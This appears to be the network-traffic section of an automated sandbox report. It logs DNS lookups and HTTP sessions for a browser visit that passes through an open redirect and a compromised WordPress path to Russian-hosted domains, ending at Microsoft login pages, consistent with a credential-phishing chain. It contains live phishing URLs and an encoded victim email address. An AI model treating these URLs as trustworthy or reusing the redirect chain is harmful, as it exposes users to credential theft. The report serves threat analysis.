                                                                          Jan 14, 2025 22:50:27.054054022 CET53510211.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:27.055463076 CET53520131.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:27.093502998 CET5570753192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:27.093974113 CET6240153192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:27.100652933 CET53557071.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:27.101490974 CET53624011.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:27.622196913 CET5672753192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:27.622546911 CET6213153192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:27.629147053 CET53567271.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:27.629378080 CET53621311.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:27.647567034 CET6470053192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:27.647726059 CET6310553192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:27.654299021 CET53647001.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:27.654442072 CET53631051.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.382585049 CET6263353192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:29.382725000 CET5144253192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:29.389411926 CET53514421.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:29.389458895 CET53626331.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:32.508462906 CET138138192.168.2.4192.168.2.255
                                                                          Jan 14, 2025 22:50:33.641863108 CET53650211.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:44.146241903 CET6493853192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:44.146378040 CET5695453192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:44.222590923 CET53569541.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:44.244833946 CET53649381.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:45.971035004 CET6014253192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:45.971491098 CET5946053192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:46.024199009 CET6100053192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:46.024738073 CET4924653192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:46.037859917 CET53610001.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:46.074965954 CET53492461.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:47.227240086 CET5836653192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:47.227370977 CET6116153192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:47.270984888 CET53611611.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:49.438978910 CET5786853192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:49.438978910 CET4917953192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:49.484606028 CET53491791.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:50.546049118 CET5422753192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:50.546714067 CET5500453192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:52.350727081 CET53551961.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:55.640348911 CET53648571.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:51:05.108483076 CET5137253192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:51:05.108593941 CET5470053192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:51:15.057807922 CET53632391.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:51:15.278656006 CET53545891.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:51:29.393445969 CET6089553192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:51:29.393724918 CET6191453192.168.2.41.1.1.1
                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                          Jan 14, 2025 22:50:46.075052977 CET192.168.2.41.1.1.1c2ac(Port unreachable)Destination Unreachable
                                                                          Jan 14, 2025 22:50:47.271054029 CET192.168.2.41.1.1.1c26b(Port unreachable)Destination Unreachable
                                                                          Jan 14, 2025 22:50:49.487380028 CET192.168.2.41.1.1.1c26b(Port unreachable)Destination Unreachable
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 14, 2025 22:50:19.843971968 CET192.168.2.41.1.1.10x5f68Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:19.844116926 CET192.168.2.41.1.1.10x942fStandard query (0)www.google.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:21.019300938 CET192.168.2.41.1.1.10x81aaStandard query (0)emp.eduyield.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:21.019730091 CET192.168.2.41.1.1.10x4bf6Standard query (0)emp.eduyield.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:22.067456961 CET192.168.2.41.1.1.10x66f2Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:22.067650080 CET192.168.2.41.1.1.10xa59eStandard query (0)google.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:23.687633991 CET192.168.2.41.1.1.10xbfdStandard query (0)avrancecorp.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:23.688369036 CET192.168.2.41.1.1.10xb851Standard query (0)avrancecorp.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.613975048 CET192.168.2.41.1.1.10xa289Standard query (0)wv.bomirax.ruA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.614104033 CET192.168.2.41.1.1.10x5d63Standard query (0)wv.bomirax.ru65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.735974073 CET192.168.2.41.1.1.10x766Standard query (0)avrancecorp.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.736231089 CET192.168.2.41.1.1.10x31e8Standard query (0)avrancecorp.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.241797924 CET192.168.2.41.1.1.10x2350Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.241935968 CET192.168.2.41.1.1.10x8fb4Standard query (0)code.jquery.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.242300034 CET192.168.2.41.1.1.10xa891Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.242422104 CET192.168.2.41.1.1.10xb0ddStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.242713928 CET192.168.2.41.1.1.10xf949Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.242830038 CET192.168.2.41.1.1.10xcf78Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.047396898 CET192.168.2.41.1.1.10x6c04Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.047527075 CET192.168.2.41.1.1.10xc9e2Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.093502998 CET192.168.2.41.1.1.10x5d09Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.093974113 CET192.168.2.41.1.1.10xf85fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.622196913 CET192.168.2.41.1.1.10xd2eaStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.622546911 CET192.168.2.41.1.1.10x8e4cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.647567034 CET192.168.2.41.1.1.10x7e0cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.647726059 CET192.168.2.41.1.1.10x70a2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:29.382585049 CET192.168.2.41.1.1.10x194cStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:29.382725000 CET192.168.2.41.1.1.10x5d96Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:44.146241903 CET192.168.2.41.1.1.10x12afStandard query (0)ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ruA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:44.146378040 CET192.168.2.41.1.1.10x5a7cStandard query (0)ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:45.971035004 CET192.168.2.41.1.1.10xb6a8Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:45.971491098 CET192.168.2.41.1.1.10xa5c6Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:46.024199009 CET192.168.2.41.1.1.10x9a61Standard query (0)ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ruA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:46.024738073 CET192.168.2.41.1.1.10x63c5Standard query (0)ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:47.227240086 CET192.168.2.41.1.1.10x952eStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:47.227370977 CET192.168.2.41.1.1.10xee0aStandard query (0)www.office.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:49.438978910 CET192.168.2.41.1.1.10x78f0Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:49.438978910 CET192.168.2.41.1.1.10xef5aStandard query (0)www.office.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:50.546049118 CET192.168.2.41.1.1.10xd7a2Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:50.546714067 CET192.168.2.41.1.1.10x9140Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                          Jan 14, 2025 22:51:05.108483076 CET192.168.2.41.1.1.10x5e70Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:51:05.108593941 CET192.168.2.41.1.1.10x6087Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:51:29.393445969 CET192.168.2.41.1.1.10xf156Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:51:29.393724918 CET192.168.2.41.1.1.10x5e3fStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 14, 2025 22:50:19.850900888 CET1.1.1.1192.168.2.40x942fNo error (0)www.google.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:20.303850889 CET1.1.1.1192.168.2.40x8a62No error (0)www.google.com142.250.65.164A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:21.038330078 CET1.1.1.1192.168.2.40x81aaNo error (0)emp.eduyield.com34.225.212.255A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:21.038330078 CET1.1.1.1192.168.2.40x81aaNo error (0)emp.eduyield.com44.219.249.247A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:21.038330078 CET1.1.1.1192.168.2.40x81aaNo error (0)emp.eduyield.com34.204.144.13A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:22.075043917 CET1.1.1.1192.168.2.40x66f2No error (0)google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:22.075155020 CET1.1.1.1192.168.2.40xa59eNo error (0)google.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.050293922 CET1.1.1.1192.168.2.40xbfdNo error (0)avrancecorp.com50.6.174.34A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.623203993 CET1.1.1.1192.168.2.40x5d63No error (0)wv.bomirax.ru65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.628087044 CET1.1.1.1192.168.2.40xa289No error (0)wv.bomirax.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.628087044 CET1.1.1.1192.168.2.40xa289No error (0)wv.bomirax.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.628087044 CET1.1.1.1192.168.2.40xa289No error (0)wv.bomirax.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.628087044 CET1.1.1.1192.168.2.40xa289No error (0)wv.bomirax.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.628087044 CET1.1.1.1192.168.2.40xa289No error (0)wv.bomirax.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.628087044 CET1.1.1.1192.168.2.40xa289No error (0)wv.bomirax.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.628087044 CET1.1.1.1192.168.2.40xa289No error (0)wv.bomirax.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:24.947184086 CET1.1.1.1192.168.2.40x766No error (0)avrancecorp.com50.6.174.34A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.248650074 CET1.1.1.1192.168.2.40x2350No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.248650074 CET1.1.1.1192.168.2.40x2350No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.248650074 CET1.1.1.1192.168.2.40x2350No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.248650074 CET1.1.1.1192.168.2.40x2350No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.249387980 CET1.1.1.1192.168.2.40xa891No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.249387980 CET1.1.1.1192.168.2.40xa891No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.249635935 CET1.1.1.1192.168.2.40xb0ddNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.249722958 CET1.1.1.1192.168.2.40xf949No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.249722958 CET1.1.1.1192.168.2.40xf949No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:26.251158953 CET1.1.1.1192.168.2.40xcf78No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.054054022 CET1.1.1.1192.168.2.40x6c04No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.054054022 CET1.1.1.1192.168.2.40x6c04No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.055463076 CET1.1.1.1192.168.2.40xc9e2No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.100652933 CET1.1.1.1192.168.2.40x5d09No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.100652933 CET1.1.1.1192.168.2.40x5d09No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.100652933 CET1.1.1.1192.168.2.40x5d09No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.100652933 CET1.1.1.1192.168.2.40x5d09No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.629147053 CET1.1.1.1192.168.2.40xd2eaNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.629147053 CET1.1.1.1192.168.2.40xd2eaNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.629378080 CET1.1.1.1192.168.2.40x8e4cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.654299021 CET1.1.1.1192.168.2.40x7e0cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.654299021 CET1.1.1.1192.168.2.40x7e0cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:27.654442072 CET1.1.1.1192.168.2.40x70a2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:29.389458895 CET1.1.1.1192.168.2.40x194cNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:44.222590923 CET1.1.1.1192.168.2.40x5a7cNo error (0)ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:44.244833946 CET1.1.1.1192.168.2.40x12afNo error (0)ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:44.244833946 CET1.1.1.1192.168.2.40x12afNo error (0)ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:45.978072882 CET1.1.1.1192.168.2.40xa5c6No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:45.978089094 CET1.1.1.1192.168.2.40xb6a8No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:46.037859917 CET1.1.1.1192.168.2.40x9a61No error (0)ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:46.037859917 CET1.1.1.1192.168.2.40x9a61No error (0)ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:46.074965954 CET1.1.1.1192.168.2.40x63c5No error (0)ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru65IN (0x0001)false
                                                                          Jan 14, 2025 22:50:47.234695911 CET1.1.1.1192.168.2.40x952eNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:47.234695911 CET1.1.1.1192.168.2.40x952eNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:47.270984888 CET1.1.1.1192.168.2.40xee0aNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:47.270984888 CET1.1.1.1192.168.2.40xee0aNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:48.399657011 CET1.1.1.1192.168.2.40x5d4eNo error (0)shed.dual-low.s-part-0033.t-0009.t-msedge.nets-part-0033.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:48.399657011 CET1.1.1.1192.168.2.40x5d4eNo error (0)s-part-0033.t-0009.t-msedge.net13.107.246.61A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:49.421540976 CET1.1.1.1192.168.2.40x7310No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:49.421540976 CET1.1.1.1192.168.2.40x7310No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:49.446181059 CET1.1.1.1192.168.2.40x78f0No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:49.446181059 CET1.1.1.1192.168.2.40x78f0No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:49.484606028 CET1.1.1.1192.168.2.40xef5aNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:49.484606028 CET1.1.1.1192.168.2.40xef5aNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:50.553311110 CET1.1.1.1192.168.2.40xd7a2No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:50.553311110 CET1.1.1.1192.168.2.40xd7a2No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:50.553311110 CET1.1.1.1192.168.2.40xd7a2No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:50.554198980 CET1.1.1.1192.168.2.40x9140No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:50:50.554198980 CET1.1.1.1192.168.2.40x9140No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:51:05.115272999 CET1.1.1.1192.168.2.40x5e70No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:51:05.115968943 CET1.1.1.1192.168.2.40x6087No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:51:29.646076918 CET1.1.1.1192.168.2.40x5e3fNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 14, 2025 22:51:29.646548033 CET1.1.1.1192.168.2.40xf156No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                          • emp.eduyield.com
                                                                          • google.com
                                                                          • www.google.com
                                                                          • avrancecorp.com
                                                                            • wv.bomirax.ru
                                                                          • https:
                                                                            • cdnjs.cloudflare.com
                                                                            • challenges.cloudflare.com
                                                                            • code.jquery.com
                                                                            • ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru
                                                                          • a.nel.cloudflare.com
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.44974550.6.174.34804008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 14, 2025 22:50:24.056106091 CET509OUTGET /wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3 HTTP/1.1
                                                                          Host: avrancecorp.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Jan 14, 2025 22:50:24.557478905 CET339INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:12 GMT
                                                                          Server: Apache
                                                                          refresh: 0;url=https://wv.bomirax.ru/Z1cxl9eG/#M$ZGFrb3
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, Keep-Alive
                                                                          Cache-Control: max-age=7200
                                                                          Expires: Tue, 14 Jan 2025 23:50:12 GMT
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Jan 14, 2025 22:50:24.616803885 CET453OUTGET /favicon.ico HTTP/1.1
                                                                          Host: avrancecorp.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Referer: http://avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Jan 14, 2025 22:50:24.732878923 CET563INHTTP/1.1 301 Moved Permanently
                                                                          Date: Tue, 14 Jan 2025 21:50:12 GMT
                                                                          Server: Apache
                                                                          Location: https://avrancecorp.com/404.shtml
                                                                          Cache-Control: max-age=7200
                                                                          Expires: Tue, 14 Jan 2025 23:50:12 GMT
                                                                          Content-Length: 241
                                                                          Keep-Alive: timeout=5, max=99
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 72 61 6e 63 65 63 6f 72 70 2e 63 6f 6d 2f 34 30 34 2e 73 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://avrancecorp.com/404.shtml">here</a>.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.44974234.225.212.2554434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:21 UTC858OUTGET /el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789 HTTP/1.1
                                                                          Host: emp.eduyield.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:22 UTC293INHTTP/1.1 303 See Other
